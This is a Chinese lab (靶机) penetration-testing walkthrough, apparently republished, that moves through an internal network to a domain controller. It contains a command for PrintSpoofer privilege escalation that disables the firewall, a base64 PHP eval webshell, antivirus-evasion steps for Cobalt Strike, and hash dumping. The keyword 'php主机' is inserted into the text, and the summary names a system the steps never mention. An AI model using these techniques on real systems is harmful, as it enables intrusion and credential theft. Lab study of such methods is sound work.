php主机 详解内网漫游姿势-绕杀软拿域控(下)
“
前言:
上周,小星与大家分享了绕杀软拿域控中的渗透、sql注入、密码找回漏洞三大操作过程。本期小星将会展示如何利用提权操作、提权免杀和其它方式,成功取得3台靶机权限,绕过安全拦
“ 前言: 上周,小星与大家分享了绕杀软拿域控中的渗透、sql注入、密码找回漏洞三大操作过程。本期小星将会展示如何利用提权操作、提权免杀和其它方式,成功取得3台靶机权限,绕过安全拦截以畅游内网。 上期回顾: ” 1. 查看主机,存在双网卡192.168.0.0/24以及10.10.1.0/24。 2. 查看进程,识别进程中当前主机上存在的安全狗和微软杀毒。 3. 查看已开放的服务,其中存在print spooler,后续我们可以利用该服务来进行提权操作。 4. 目前权限较低,需要进行提权操作。同时,因为当前主机存在杀软,所以需要进行免杀处理。网上搜索print spooler提权免杀,发现了可利用工具。 5. 上传PrintSpoofer64.exe到Windows/temp/目录下,执行命令提权成功后关闭防火墙。 PrintSpoofer64.exe -i -c "netsh advfirewall set allprofiles state off"。 6. 上线至CS,对10.10.1.0/24 主机进行存活扫描,发现10.10.1.130主机存活且开放了80端口。 7. 使用CS搭建socks4代理。此处原计划是利用msf来搭建socks5代理,但因其搭建代理后无法访问内网服务,所以最终选择了socks4完成操作。 8. 使用代理访问网站通达OA系统。 9. 搜索通达OA系统漏洞,此处可以直接使用OA相关工具来进行扫描利用,但该步骤以使用手工形式来进行漏洞利用。测试后发现,该系统存在文件上传以及文件中需要getshell 进行手工验证,直接访问 后显示用户未登录。 10. 搜索该漏洞详情,可以通过P参数来绕过代码逻辑。 11. 因为代码存在黑名单,先上传图片马,在使用文件中包含绕过过程。 12. 利用文件及其漏洞(含刚才上传的图片马)。 13. 执行命令,当前用户为system权限。 14. 此处尝试直接写入一句话木马,但是因为单引号、双引号被转义了,因此使用base64写入了一句话。 echoPD9waHAKZXZhbCgkX1BPU1RbaGFoYV0pOwo/Pg==> 1.txt type nul >haha.php certutil -f -decode 1.txt haha.php 15. 蚁剑设置代理后,连接刚才写入的webshell,成功拿下第二台机器。 16. 当前主机也存在双网卡 10.10.1.0/24和10.10.10.0/24。 17. 查看进程,发现存在域管理员进程。 18. 对进程进行杀软识别,发现进程存在360 软件。然而,此前写入的一句话没有做免杀处理php主机,但也没有被封杀,小星对此现象也在继续研究着。 19. 直接定位到域控为10.10.10.165。 20. 关闭当前主机的防火墙,并上线至CS。此处生成一个正向的木马,选择Beacon TCP。因为此处有360杀软,所以木马需要进行免杀处理。 21. 将木马文件上传到蚁剑并执行,在CS中执行 connect 10.10.1.130 4567 后成功上线。 22. 通过前面的信息搜集我们已经知道当前主机是存在域管理员进程的,此处尝试注入进程。 23. 成功获取域控权限,至此已经拿下这三台靶机权限。 备注:CS上线后要迁移进程,否则如果免杀处理不当,一段时间过后也会被杀软查杀的。 24. dump出所有用户有密码的hash。 总结 通过本次打靶、siteserver系统的多种利用方法,我们成功达成内网漫游的目标。虽然过程中遇到了如socks5代理搭建成功后却无法访问内网服务的问题,但在对内网的通达OA系统进行利用时,小星发现了我们是可以直接使用相关工具来快速利用的。只是因为小星个人比较喜欢手工,所以才使用了手工的方法。 (编辑:好传媒网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |